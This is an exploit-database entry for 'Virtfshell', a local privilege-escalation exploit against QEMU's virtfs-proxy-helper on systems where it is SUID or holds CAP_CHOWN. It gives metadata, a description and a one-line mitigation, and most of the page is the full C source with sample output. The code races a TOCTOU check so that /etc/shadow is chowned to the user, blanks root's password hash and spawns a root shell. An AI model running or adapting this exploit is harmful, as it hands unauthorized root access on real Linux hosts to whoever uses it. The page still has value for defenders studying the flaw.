Virtfshell

vendor:

N/A

by:

zx2c4

7,2

CVSS

HIGH

Time-of-Check-Time-of-Use (TOCTOU)

362

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Gentoo

2015

Virtfshell is an exploit that takes advantage of the Time-of-Check-Time-of-Use (TOCTOU) vulnerability in the virtfs-proxy-helper from QEMU. The exploit makes use of the inotify_init() and inotify_add_watch() functions to monitor the /tmp/virtfshell directory for changes. When the virtfs-proxy-helper is executed, it creates a socket in the /tmp/virtfshell directory. The exploit then replaces the socket with a symlink to /etc/shadow, which is then chown'd to the user's UID and GID, thus elevating the user to root. The exploit then runs a cleanup script to remove any traces of the exploit.

Mitigation:

The best way to mitigate this vulnerability is to not make virtfs-proxy-helper from QEMU either SUID or give it CAP_CHOWN fs capabilities.

Source

Exploit-DB raw data:

/* == virtfshell ==
 *
 * Some distributions make virtfs-proxy-helper from QEMU either SUID or
 * give it CAP_CHOWN fs capabilities. This is a terrible idea. While
 * virtfs-proxy-helper makes some sort of flimsy check to make sure
 * its socket path doesn't already exist, it is vulnerable to TOCTOU.
 *
 * This should spawn a root shell eventually on vulnerable systems.
 *
 * - zx2c4
 * 2015-12-12
 *
 *
 * zx2c4@thinkpad ~ $ lsb_release -i
 * Distributor ID: Gentoo
 * zx2c4@thinkpad ~ $ ./virtfshell 
 * == Virtfshell - by zx2c4 ==
 * [+] Trying to win race, attempt 749
 * [+] Chown'd /etc/shadow, elevating to root
 * [+] Cleaning up
 * [+] Spawning root shell
 * thinkpad zx2c4 # whoami
 * root
 *
 */

#include <stdio.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>


static int it_worked(void)
{
	struct stat sbuf = { 0 };
	stat("/etc/shadow", &sbuf);
	return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
}

int main(int argc, char **argv)
{
	int fd;
	pid_t pid;
	char uid[12], gid[12];
	size_t attempts = 0;

	sprintf(uid, "%d", getuid());
	sprintf(gid, "%d", getgid());

	printf("== Virtfshell - by zx2c4 ==\n");

	printf("[+] Beginning race loop\n");

	while (!it_worked()) {
		printf("\033[1A\033[2K[+] Trying to win race, attempt %zu\n", ++attempts);
		fd = inotify_init();
		unlink("/tmp/virtfshell/sock");
		mkdir("/tmp/virtfshell", 0777);
		inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
		pid = fork();
		if (pid == -1)
			continue;
		if (!pid) {
			close(0);
			close(1);
			close(2);
			execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);
			_exit(1);
		}
		read(fd, 0, 0);
		unlink("/tmp/virtfshell/sock");
		symlink("/etc/shadow", "/tmp/virtfshell/sock");
		close(fd);
		kill(pid, SIGKILL);
		wait(NULL);
	}

	printf("[+] Chown'd /etc/shadow, elevating to root\n");

	system(	"cp /etc/shadow /tmp/original_shadow;"
		"sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;"
		"cat /tmp/modified_shadow > /etc/shadow;"
		"su -c '"
		"	echo [+] Cleaning up;"
		"	cat /tmp/original_shadow > /etc/shadow;"
		"	chown root:root /etc/shadow;"
		"	rm /tmp/modified_shadow /tmp/original_shadow;"
		"	echo [+] Spawning root shell;"
		"	exec /bin/bash -i"
		"'");
	return 0;
}